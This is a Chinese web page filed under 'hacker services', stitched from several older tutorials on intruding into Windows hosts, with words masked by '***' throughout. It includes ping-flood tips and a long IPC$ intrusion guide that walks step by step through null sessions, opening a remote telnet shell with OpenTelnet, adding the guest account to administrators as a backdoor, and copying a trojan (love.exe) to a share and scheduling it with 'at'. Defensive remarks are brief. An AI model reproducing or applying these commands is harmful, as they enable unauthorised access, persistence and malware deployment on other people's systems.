当前位置:首页 > 黑客业务 > 正文内容

如何以管理员身份入侵网站(如何以管理员身份入侵网站视频)

hacker2年前 (2022-09-20)黑客业务88

文章大纲:

如何以管理员的身份进入操作系统?

事实上看你是什么系统了。XP的话,很多都可以这样做:

你先设置你的用户密码,然后重启后进入输入密码那步,你恩ctrl+alt+del你可以打开对话框,你输入administrator回车就好了,这个是超级用户,

你还可以进入安全模式,那里可以直接进administrator,然后进入后你可以删除你的另一个用户,那样重启你就可以进入超级用户了。最后,如果是远程状态(譬如入侵),我不会!慢慢试试吧

解释解释入侵网站的原理

一、获取口令

这种方式有三种 *** :一是缺省的登录界面(ShellScripts)攻击法。在被攻击主机上启动一个可执行程序,该程序显示一个伪造的登录界面。当用户在这个伪装的界面上键入登录信息(用户名、密码等)后,程序将用户输入的信息传送到攻击者主机,然后关闭界面给出提示信息“系统故障”,要求用户重新登录。此后,才会出现真正的登录界面。二是通过 *** 监听非法得到用户口令,这类 *** 有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;三是在知道用户的账号后(如电子邮件“@”前面的部分)利用一些专门软件强行破解用户口令,这种 *** 不受网段限制,但黑客要有足够的耐心和时间;尤其对那些口令安全系数极低的用户,只要短短的一两分钟,甚至几十秒内就可以将其破解。

二、电子邮件攻击

这种方式一般是采用电子邮件炸弹(E-mailBomb),是黑客常用的一种攻击手段。指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的恶意邮件,也可称之为大容量的垃圾邮件。由于每个人的邮件信箱是有限的,当庞大的邮件垃圾到达信箱的时候,就会挤满信箱,把正常的邮件给冲掉。同时,因为它占用了大量的 *** 资源,常常导致 *** 塞车,使用户不能正常地工作,严重者可能会给电子邮件服务器操作系统带来危险,甚至瘫痪。

三、特洛伊木马攻击

“特洛伊木马程序”技术是黑客常用的攻击手段。它通过在你的电脑系统隐藏一个会在Windows启动时运行的程序,采用服务器/客户机的运行方式,从而达到在上网时控制你电脑的目的。黑客利用它窃取你的口令、浏览你的驱动器、修改你的文件、登录注册表等等,如流传极广的冰河木马,现在流行的很多病毒也都带有黑客性质,如影响面极广的“Nimda”、“求职信”和“红色代码”及“红色代码II”等。攻击者可以佯称自己为系统管理员(邮件地址和系统管理员完全相同),将这些东西通过电子邮件的方式发送给你。如某些单位的 *** 管理员会定期给用户免费发送防火墙升级程序,这些程序多为可执行程序,这就为黑客提供了可乘之机,很多用户稍不注意就可能在不知不觉中遗失重要信息。

四、诱入法

黑客编写一些看起来“合法”的程序,上传到一些FTP站点或是提供给某些个人主页,诱导用户下载。当一个用户下载软件时,黑客的软件一起下载到用户的机器上。该软件会跟踪用户的电脑操作,它静静地记录着用户输入的每个口令,然后把它们发送给黑客指定的Internet信箱。例如,有人发送给用户电子邮件,声称为“确定我们的用户需要”而进行调查。作为对填写表格的回报,允许用户 *** 多少小时。但是,该程序实际上却是搜集用户的口令,并把它们发送给某个远方的“黑客”。

五、寻找系统漏洞

许多系统都有这样那样的安全漏洞(Bugs),其中某些是操作系统或应用软件本身具有的,如Sendmail漏洞,Windows98中的共享目录密码验证漏洞和IE5漏洞等,这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏,除非你不上网。还有就是有些程序员设计一些功能复杂的程序时,一般采用模块化的程序设计思想,将整个项目分割为多个功能模块,分别进行设计、调试,这时的后门就是一个模块的秘密入口。在程序开发阶段,后门便于测试、更改和增强模块功能。正常情况下,完成设计之后需要去掉各个模块的后门,不过有时由于疏忽或者其他原因(如将其留在程序中,便于日后访问、测试或维护)后门没有去掉,一些别有用心的人会利用专门的扫描工具发现并利用这些后门,然后进入系统并发动攻击。

现在,你该知道黑客惯用的一些攻击手段了吧?当我们对黑客们的这些行为有所了解后,就能做到“知己知彼,百战不殆”,从而更有效地防患于未然,拒黑客于“机”外。 *** 的开放性决定了它的复杂性和多样性,随着技术的不断进步,各种各样高明的黑客还会不断诞生,同时,他们使用的手段也会越来越先进。我们惟有不断提高个人的安全意识,再加上必要的防护手段,斩断黑客的黑手。相信通过大家的努力,黑客们的舞台将会越来越小,个人用户可以高枕无忧地上网冲浪,还我们一片宁静的天空。

一,ping

它是用来检查 *** 是否通畅或者 *** 连接速度的命令。作为一个生活在 *** 上的管理员或者黑客来说,ping命令是之一个必须掌握的DOS命令,它所利用的原理是这样的: *** 上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作。先看看帮助吧,在DOS窗口中键入:ping /? 回车,。所示的帮助画面。在此,我们只掌握一些基本的很有用的参数就可以了(下同)。

-t 表示将不间断向目标IP发送数据包,直到我们强迫其停止。试想,如果你使用100M的宽带接入,而目标IP是56K的小猫,那么要不了多久,目标IP就因为承受不了这么多的数据而掉线,呵呵,一次攻击就这么简单的实现了。

-l 定义发送数据包的大小,默认为32字节,我们利用它可以更大定义到65500字节。结合上面介绍的-t参数一起使用,会有更好的效果哦。

-n 定义向目标IP发送数据包的次数,默认为3次。如果 *** 速度比较慢,3次对我们来说也浪费了不少时间,因为现在我们的目的仅仅是判断目标IP是否存在,那么就定义为一次吧。

说明一下,如果-t 参数和 -n参数一起使用,ping命令就以放在后面的参数为标准,比如“ping IP -t -n 3”,虽然使用了-t参数,但并不是一直ping下去,而是只ping 3次。另外,ping命令不一定非得ping IP,也可以直接ping主机域名,这样就可以得到主机的IP。

下面我们举个例子来说明一下具体用法。

这里time=2表示从发出数据包到接受到返回数据包所用的时间是2秒,从这里可以判断 *** 连接速度的大小 。从TTL的返回值可以初步判断被ping主机的操作系统,之所以说“初步判断”是因为这个值是可以修改的。这里TTL=32表示操作系统可能是win98。

(小知识:如果TTL=128,则表示目标主机可能是Win2000;如果TTL=250,则目标主机可能是Unix)

至于利用ping命令可以快速查找局域网故障,可以快速搜索最快的 *** 服务器,可以对别人进行ping攻击……这些就靠大家自己发挥了。

二,nbtstat

该命令使用TCP/IP上的NetBIOS显示协议统计和当前TCP/IP连接,使用这个命令你可以得到远程主机的NETBIOS信息,比如用户名、所属的工作组、网卡的MAC地址等。在此我们就有必要了解几个基本的参数。

-a 使用这个参数,只要你知道了远程主机的机器名称,就可以得到它的NETBIOS信息(下同)。

-A 这个参数也可以得到远程主机的NETBIOS信息,但需要你知道它的IP。

-n 列出本地机器的NETBIOS信息。

当得到了对方的IP或者机器名的时候,就可以使用nbtstat命令来进一步得到对方的信息了,这又增加了我们入侵的保险系数。

三,netstat

这是一个用来查看 *** 状态的命令,操作简便功能强大。

-a 查看本地机器的所有开放端口,可以有效发现和预防木马,可以知道机器所开的服务等信息,如图4。

这里可以看出本地机器开放有FTP服务、Telnet服务、邮件服务、WEB服务等。用法:netstat -a IP。

-r 列出当前的路由信息,告诉我们本地机器的网关、子网掩码等信息。用法:netstat -r IP。

四,tracert

跟踪路由信息,使用此命令可以查出数据从本地机器传输到目标主机所经过的所有途径,这对我们了解 *** 布局和结构很有帮助。如图5。

这里说明数据从本地机器传输到192.168.0.1的机器上,中间没有经过任何中转,说明这两台机器是在同一段局域网内。用法:tracert IP。

五,net

这个命令是 *** 命令中最重要的一个,必须透彻掌握它的每一个子命令的用法,因为它的功能实在是太强大了,这简直就是微软为我们提供的更好的入侵工具。首先让我们来看一看它都有那些子命令,键入net /?回车如图6。

在这里,我们重点掌握几个入侵常用的子命令。

net view

使用此命令查看远程主机的所以共享资源。命令格式为net view \\IP。

net use

把远程主机的某个共享资源影射为本地盘符,图形界面方便使用,呵呵。命令格式为net use x: \\IP\sharename。上面一个表示把192.168.0.5IP的共享名为magic的目录影射为本地的Z盘。下面表示和192.168.0.7建立IPC$连接(net use \\IP\IPC$ "password" /user:"name"),

建立了IPC$连接后,呵呵,就可以上传文件了:copy nc.exe \\192.168.0.7\admin$,表示把本地目录下的nc.exe传到远程主机,结合后面要介绍到的其他DOS命令就可以实现入侵了。

net start

使用它来启动远程主机上的服务。当你和远程主机建立连接后,如果发现它的什么服务没有启动,而你又想利用此服务怎么办?就使用这个命令来启动吧。用法:net start servername,如图9,成功启动了telnet服务。

net stop

入侵后发现远程主机的某个服务碍手碍脚,怎么办?利用这个命令停掉就ok了,用法和net start同。

net user

查看和帐户有关的情况,包括新建帐户、删除帐户、查看特定帐户、激活帐户、帐户禁用等。这对我们入侵是很有利的,最重要的,它为我们克隆帐户提供了前提。键入不带参数的net user,可以查看所有用户,包括已经禁用的。下面分别讲解。

1,net user abcd 1234 /add,新建一个用户名为abcd,密码为1234的帐户,默认为user组成员。

2,net user abcd /del,将用户名为abcd的用户删除。

3,net user abcd /active:no,将用户名为abcd的用户禁用。

4,net user abcd /active:yes,激活用户名为abcd的用户。

5,net user abcd,查看用户名为abcd的用户的情况

net localgroup

查看所有和用户组有关的信息和进行相关操作。键入不带参数的net localgroup即列出当前所有的用户组。在入侵过程中,我们一般利用它来把某个帐户提升为administrator组帐户,这样我们利用这个帐户就可以控制整个远程主机了。用法:net localgroup groupname username /add。

现在我们把刚才新建的用户abcd加到administrator组里去了,这时候abcd用户已经是超级管理员了,呵呵,你可以再使用net user abcd来查看他的状态,和图10进行比较就可以看出来。但这样太明显了,网管一看用户情况就能漏出破绽,所以这种 *** 只能对付菜鸟网管,但我们还得知道。现在的手段都是利用其他工具和手段克隆一个让网管看不出来的超级管理员,这是后话。有兴趣的朋友可以参照《黑客防线》第30期上的《由浅入深解析隆帐户》一文。

net time

这个命令可以查看远程主机当前的时间。如果你的目标只是进入到远程主机里面,那么也许就用不到这个命令了。但简单的入侵成功了,难道只是看看吗?我们需要进一步渗透。这就连远程主机当前的时间都需要知道,因为利用时间和其他手段(后面会讲到)可以实现某个命令和程序的定时启动,为我们进一步入侵打好基础。用法:net time \\IP。

六,at

这个命令的作用是安排在特定日期或时间执行某个特定的命令和程序(知道net time的重要了吧?)。当我们知道了远程主机的当前时间,就可以利用此命令让其在以后的某个时间(比如2分钟后)执行某个程序和命令。用法:at time command \\computer。

表示在6点55分时,让名称为a-01的计算机开启telnet服务(这里net start telnet即为开启telnet服务的命令)。

七,ftp

大家对这个命令应该比较熟悉了吧? *** 上开放的ftp的主机很多,其中很大一部分是匿名的,也就是说任何人都可以登陆上去。现在如果你扫到了一台开放ftp服务的主机(一般都是开了21端口的机器),如果你还不会使用ftp的命令怎么办?下面就给出基本的ftp命令使用 *** 。

首先在命令行键入ftp回车,出现ftp的提示符,这时候可以键入“help”来查看帮助(任何DOS命令都可以使用此 *** 查看其帮助)。

大家可能看到了,这么多命令该怎么用?其实也用不到那么多,掌握几个基本的就够了。

首先是登陆过程,这就要用到open了,直接在ftp的提示符下输入“open 主机IP ftp端口”回车即可,一般端口默认都是21,可以不写。接着就是输入合法的用户名和密码进行登陆了,这里以匿名ftp为例介绍。

用户名和密码都是ftp,密码是不显示的。当提示**** logged in时,就说明登陆成功。这里因为是匿名登陆,所以用户显示为Anonymous。

接下来就要介绍具体命令的使用 *** 了。

dir 跟DOS命令一样,用于查看服务器的文件,直接敲上dir回车,就可以看到此ftp服务器上的文件。

cd 进入某个文件夹。

get 下载文件到本地机器。

put 上传文件到远程服务器。这就要看远程ftp服务器是否给了你可写的权限了,如果可以,呵呵,该怎么 利用就不多说了,大家就自由发挥去吧。

delete 删除远程ftp服务器上的文件。这也必须保证你有可写的权限。

bye 退出当前连接。

quit 同上。

八,telnet

功能强大的远程登陆命令,几乎所有的入侵者都喜欢用它,屡试不爽。为什么?它操作简单,如同使用自己的机器一样,只要你熟悉DOS命令,在成功以administrator身份连接了远程机器后,就可以用它来 *** 想干的一切了。下面介绍一下使用 *** ,首先键入telnet回车,再键入help查看其帮助信息。

然后在提示符下键入open IP回车,这时就出现了登陆窗口,让你输入合法的用户名和密码,这里输入任何密码都是不显示的。

当输入用户名和密码都正确后就成功建立了telnet连接,这时候你就在远程主机上具有了和此用户一样的权限,利用DOS命令就可以实现你想干的事情了。这里我使用的超级管理员权限登陆的。

到这里为止, *** DOS命令的介绍就告一段落了,这里介绍的目的只是给菜鸟网管一个印象,让其知道熟悉和掌握 *** DOS命令的重要性。其实和 *** 有关的DOS命令还远不止这些,这里只是抛砖引玉,希望能对广大菜鸟网管有所帮助。学好DOS对当好网管有很大的帮助,特别的熟练掌握了一些 *** 的DOS命令。

另外大家应该清楚,任何人要想进入系统,必须得有一个合法的用户名和密码(输入法漏洞差不多绝迹了吧),哪怕你拿到帐户的只有一个很小的权限,你也可以利用它来达到最后的目的。所以坚决消灭空口令,给自己的帐户加上一个强壮的密码,是更好的防御弱口令入侵的 *** 。

最后,由衷的说一句,培养良好的安全意识才是最重要的。

局域网内可以空链接对方机,用什么 *** 入侵呢?

ipc$空连接使用

[ 2006-9-20 10:32:51 | By: yunlin2000 ]

目录 :

一 前言

二 什么是ipc$

三 什么是空会话

四 空会话可以做什么

五 ipc$连接所使用的端口

六 ipc$连接在hack攻击中的意义

七 ipc$连接失败的常见原因

八 复制文件失败的原因

九 如何打开目标的IPC$共享以及其他共享

十 一些需要shell才能完成的命令

十一 入侵中可能会用到的相关命令

十二 ipc$完整入侵步骤祥解

十三 如何防范ipc$入侵

十四 ipc$入侵问答精选

十五 结束的话

一 前言

网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。

不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于之一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!

注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。

二 什么是ipc$

IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?

三 什么是空会话

在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。

在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下:

1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建

立;

2)服务器产生一个随机的64位数(实现挑战)传送回客户;

3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结

果返回到服务器(实现响应);

4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。

以上是一个安全会话建立的大致过程,那么空会话又如何呢?

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组:

Everyone

Network

在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢?

四 空会话可以做什么

对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从 *** 访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。以下是空会话中能够使用的具体命令:

1 首先,我们先建立一个空会话(需要目标开放ipc$)

命令:net use \\ip\ipc$ "" /user:""

注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。

2 查看远程主机的共享资源

命令:net view \\IP

解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:

在 \\*.*.*.*的共享资源

资源共享名 类型 用途 注释

-----------------------------------------------------------

NETLOGON Disk Logon server share

SYSVOL Disk Logon server share

命令成功完成。

3 查看远程主机的当前时间

命令:net time \\IP

解释:用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表(需要打开自己的N *** )

nbtstat -A IP

用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status

---------------------------------------------

SERVER 00 UNIQUE Registered

OYAMANISHI-H 00 GROUP Registered

OYAMANISHI-H 1C GROUP Registered

SERVER 20 UNIQUE Registered

OYAMANISHI-H 1B UNIQUE Registered

OYAMANISHI-H 1E GROUP Registered

SERVER 03 UNIQUE Registered

OYAMANISHI-H 1D UNIQUE Registered

..__MSBROWSE__.01 GROUP Registered

INet~Services 1C GROUP Registered

IS~SERVER......00 UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。 好了,那么下面我们就来看看ipc$所使用的端口是什么?

五 ipc$所使用的端口

首先我们来了解一些基础知识:

1 *** B:(Server Message Block) Windows协议族,用于文件打印共享的服务;

2 N *** :(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS *** 互联。

3 在WindowsNT中 *** B基于N *** 实现,而在Windows2000中, *** B除了基于N *** 实现,还可以直接通过445端口实现。

有了这些基础知识,我们就可以进一步来讨论访问 *** 共享对端口的选择了:

对于win2000客户端来说:

1 如果在允许N *** 的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;

2 如果在禁止N *** 的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了N *** 后的win 2000对win NT的共享访问将会失败。

对于win2000服务器端来说:

1 如果允许N *** , 那么UDP端口137, 138, TCP 端口 139, 445将开放;

2 如果禁止N *** ,那么只有445端口开放。

我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。

六 ipc$连接在hack攻击中的意义

就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你更大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。

是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵 *** 中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!

七 ipc$连接失败的常见原因

以下是一些常见的导致ipc$连接失败的原因:

1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;

2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;

3 你未启动Lanmanworkstation服务,它提供 *** 链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);

4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);

5 对方未启动NetLogon,它支持 *** 上计算机 pass-through 帐户登录身份;

6 对方禁止了N *** (即未打开139端口);

7 对方防火墙屏蔽了139和445端口;

8 你的用户名或者密码错误(显然空会话排除这种错误);

9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;

10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。

另外,你也可以根据返回的错误号分析原因:

错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限;

错误号51,Windows无法找到 *** 路径: *** 有问题;

错误号53,找不到 *** 路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);

错误号67,找不到 *** 名:你的lanmanworkstation服务未启动或者目标删除了ipc$;

错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连;

错误号1326,未知的用户名或错误密码:原因很明显了;

错误号1792,试图登录,但是 *** 登录服务没有启动:目标NetLogon服务未启动;

错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

八 复制文件失败的原因

有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?

1 盲目复制

这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。

2 默认共享判断错误

这类错误也是大家经常犯的,主要有两个小方面:

1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;

2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)

3用户权限不够,包括四种情形:

1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;

2)向默认共享复制时,要具有管理员权限;

3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);

4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;

还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。

4被防火墙杀死或在局域网

也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。

呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。

九 如何打开目标的IPC$共享以及其他共享

目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。

十 一些需要shell才能完成的命令

看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:

1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;

2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;

3 运行/关闭远程主机的服务,需要在shell下完成;

4 启动/杀掉远程主机的进程,也需要在shell下完成。

十一 入侵中可能会用到的相关命令

请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:

net use \\IP\ipc$ "" /user:""

2 建立非空连接:

net use \\IP\ipc$ "psw" /user:"account"

3 查看远程主机的共享资源(但看不到默认共享)

net view \\IP

4 查看本地主机的共享资源(可以看到本地的默认共享)

net share

5 得到远程主机的用户名列表

nbtstat -A IP

6 得到本地主机的用户列表

net user

7 查看远程主机的当前时间

net time \\IP

8 显示本地主机当前服务

net start

9 启动/关闭本地服务

net start 服务名 /y

net stop 服务名 /y

10 映射远程共享:

net use z: \\IP\baby

此命令将共享名为baby的共享资源映射到z盘

11 删除共享映射

net use c: /del 删除映射的c盘,其他盘类推

net use * /del /y删除全部

12 向远程主机复制文件

copy \路径\srv.exe \\IP\共享目录名,如:

copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内

13 远程添加计划任务

at \\ip 时间 程序名,如:

at \\127.0.0.0 11:00 love.exe

注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径

14 开启远程主机的telnet

这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:

1)目标开启了ipc$共享

2)你要拥有管理员密码和帐号

3)目标开启RemoteRegistry服务,用户就该ntlm认证

4)对WIN2K/XP有效,NT未经测试

命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port

试例如下:c:\OpenTelnet.exe \\*.*.*.* administrator "" 1 90

15 激活用户/加入管理员组

1 net uesr account /active:yes

2 net localgroup administrators account /add

16 关闭远程主机的telnet

同样需要一个小程序:ResumeTelnet.exe

命令格式:ResumeTelnet.exe \\server account psw

试例如下:c:\ResumeTelnet.exe \\*.*.*.* administrator ""

17 删除一个已建立的ipc$连接

net use \\IP\ipc$ /del

(本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创)

十二 ipc$完整入侵步骤祥解

其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!

1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空

2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧

3上面开telnet的命令没忘吧,要用到opentelnet这个小程序

c:\OpenTelnet.exe \\192.168.21.* administrator "" 1 90

如果返回如下信息

*******************************************************

Remote Telnet Configure, by refdom

Email: refdom@263.net

OpenTelnet.exe

Usage:OpenTelnet.exe \\server username password NTLMAuthor telnetport

*******************************************************

Connecting \\192.168.21.*...Successfully!

NOTICE!!!!!!

The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23

Starting telnet service...

telnet service is started successfully! telnet service is running!

BINGLE!!!Yeah!!

Telnet Port is 90. You can try:"telnet ip 90", to connect the server!

Disconnecting server...Successfully!

*说明你已经打开了一个端口90的telnet。

4 现在我们telnet上去

telnet 192.168.21.* 90

如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了

5 C:\net user guest /active:yes

*将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no

6 C:\net user guest 1234

*将Guest的密码改为1234,或者改成你喜欢的密码

7 C:\net localgroup administrators guest /add

*将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。

8 好了,现在我们来走另一条路,给它传个木马玩玩

9 首先,我们先建立起ipc$连接

C:\net use \\192.168.21.*\ipc$ "" /user:administrator

10 既然要上传东西,就要先知道它开了什么共享

C:\net view \\192.168.21.*

在 \\192.168.21.*的共享资源

资源共享名 类型 用途 注释

-----------------------------------------------------------

C Disk

D Disk

命令成功完成。

*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我们并不能判断对方是否开启了默认共享。

11 C:\copy love.exe \\192.168.21.*\c

已复制 1 个文件

*用这个命令你可以将木马客户端love.exe传到对方的c盘下,当然,如果能复制到系统文件夹下是更好的了,不容易被发现

12 运行木马前,我们先看看它现在的时间

net time \\192.168.21.*

\\192.168.21.*的当前时间是 2003/8/22 上午 11:00

命令成功完成

13 现在我们用at运行它吧,不过对方一定要开了Task Scheduler服务(允许程序在指定时间运行),否则就不行了

C:\at \\192.168.21.* 11:02 c:\love.exe

新加了一项作业,其作业 ID = 1

